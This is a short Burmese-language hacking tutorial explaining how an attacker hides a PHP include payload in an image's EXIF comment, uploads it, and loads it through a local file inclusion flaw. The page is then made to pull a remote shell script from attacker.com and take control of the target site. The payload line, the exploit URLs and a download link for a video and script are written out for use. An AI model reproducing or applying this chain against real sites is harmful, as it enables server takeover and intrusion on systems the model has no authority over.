
EXIF ဆိုတာကေတာ့ Exchangable File Format ကိုေခၚတာပါ။ သူဟာ digital
camera ေတြမွာသုံးတဲ့ file format တစ္ခုျဖစ္ပါတယ္ သူ႕ကို Japan Electronic
Industry Development Association (JEIDA) ကေန create လုပ္ခဲ့တာပါ။
သူ႕ကို JPEG, TIFF Rev, RIFF WAVE file format ေတြမွာ meta data tag ေတြနဲ႕သုံးၾကပါတယ္
ဟုတ္ျပီ အဲဒီ EXIF Data ေတြကို Attacker (Hacker) ေတြဟာသူတို႕ရဲ့
Hacking ေတြမွာဘယ္လိုအသုံးခ်ၾကလဲ။ ဘာေၾကာင့္ Attacker (Hacker)
ေတြဟာသူတို႕ရဲ့ Hacking ေတြမွာ အသုံးခ်ႏိုင္တာလဲဆိုေတာ့ ႐ိုး႐ိုးသာမန္
image ေတြမွာ Attacker (Hacker) ေတြဟာ PHP
coding ေတြကို ထည့္သြင္းႏိုင္လို႕ပဲျဖစ္ပါတယ္။ ဒါေပမဲ့သတိျပဳရမွာတစ္ခုကေတာ့
အဲဒီ image ကို browse လုပ္လိုက္ျပီး ၾကည့္လိုက္ေပမဲ့ Attacker
ကထည့္သြင္းထားတဲ့ PHP code ကို process လုပ္မွာမဟုတ္ပါဘူး။
ဟုတ္ျပီအဲဒါဆို EXIF Data ေတြဟာ Attacker (Hacker) ေတြကို သူတို႕ရဲ့
Hacking ေတြျပဳလုပ္ရာမွာဘယ္လိုအေထာက္အကူေပးသလဲဆိုတာၾကည့္လိုက ္ၾကရေအာင္။
ဥပမာ Attacker (Hacker) ဟာ LFI vulnerable ျဖစ္တဲ့ site
တစ္ခုကိုေတြ႕လိုက္တယ္ဆိုပါစို႕။ ဒါဆိုသူ႕အေနနဲ႕ Server ေပၚမွာရွိတဲ့ File
ေတြကို access လုပ္လို႕ပဲရဦးမယ္။ တကယ္လို႕မ်ားသူဟာ
ဒီထပ္ပိုျပီးအေသးစိတ္သိခ်င္မယ္ file ေတြကို ဒီထပ္ပိုျပီး လြယ္လြယ္ကူကူနဲ႕
access လုပ္ခ်င္မယ္ဆိုရင္ေတာ့ သူ႕အတြက္ Shell Script တစ္ခုလိုလာပါျပီ။
အဲဒါဆိုရင္သူဟာ LFI vulnerability ကေန RFI vulnerability
ျဖစ္ေအာင္က်ိဳးစားရပါေတာ့မယ္။ တကယ္လို႕မ်ား အဲဒီ site ဟာ image ေတြကို
upload ေပးလုပ္တယ္ဆိုရင္ေတာ့သူ႕အတြက္ၾကိဳးစားဖို႕အခြင့္အေရး
အမ်ားၾကီးရွိသြားပါျပီ။
ဒါဆိုရင္ေတာ့သူဟာ သူ႕ရဲ့ image file ထဲမွာ ေအာက္မွာျပထားတဲ့ RFI vulnerable ျဖစ္တဲ့ PHP Script ကိုထည့္သြင္းႏိုင္ပါတယ္။
<? @include($_GET['shell']); ?>
အဲဒီ PHP Script ကို image ရဲ့ comment ထဲမွာထည့္သြင္းပါလိမ့္မယ္။
ျပီးရင္ေတာ့ အဲဒီ image ကို site ရဲ့ vulnerability ကေနတဆင့္ ေခၚယူဖို႕ၾကိဳးစားပါလိမ့္မယ္။
ဥပမာ အဲဒီ site ရဲ့ vulnerable ျဖစ္တဲ့ URL String ဟာေအာက္မွာေဖာ္ျပထားတဲ့အတိုင္းပဲျဖစ္တယ္ဆိုၾကပါ စို႕။
http://site.com/index.php?page=page.php
Attacker (Hacker) upload လုပ္လိုက္တဲ့ image ဟာ images ဆိုတဲ့ path
ထဲမွာ 1.jpg အေနနဲ႕ေရာက္ရွိသြားတယ္ဆိုပါစို႕။ ဒါဆို Attacker (Hacker)
ကဒီလိုမ်ိဳးၾကိဳးပမ္းႏိုင္ပါတယ္။
http://site.com/index.php?page=1.jpg
ဒါေပမဲ့တကယ့္ image ကိုျမင္ရမွာမဟုတ္ပါဘူး အဲဒီေနရာမွာ image
ထဲမွာထည့္သြင္းထားတဲ့ RFI vulnerability ကေနတဆင့္ Attacker (Hacker) ရဲ့
site မွာထည့္သြင္းထားတဲ့ Shell Script ကိုေခၚရမွာျဖစ္ပါတယ္။
http://site.com/index.php?page=1.jpg&shell=http%3A%2F%2Fattacker.com%2Fshell.php
ဒါဆိုရင္ေတာ့ site.com ကို Attacker ရဲ့ site က shell.php ကိုအသုံးျပဳျပီး ၾကိဳက္သလိုထိန္းခ်ဳပ္လို႕ရသြားပါျပီ
movie tutorial ၾကည့္ခ်င္သူေတြအတြက္ movie + script
http://shrta.com/files/YWFNZYV5/exif.rar
source - Ghost Area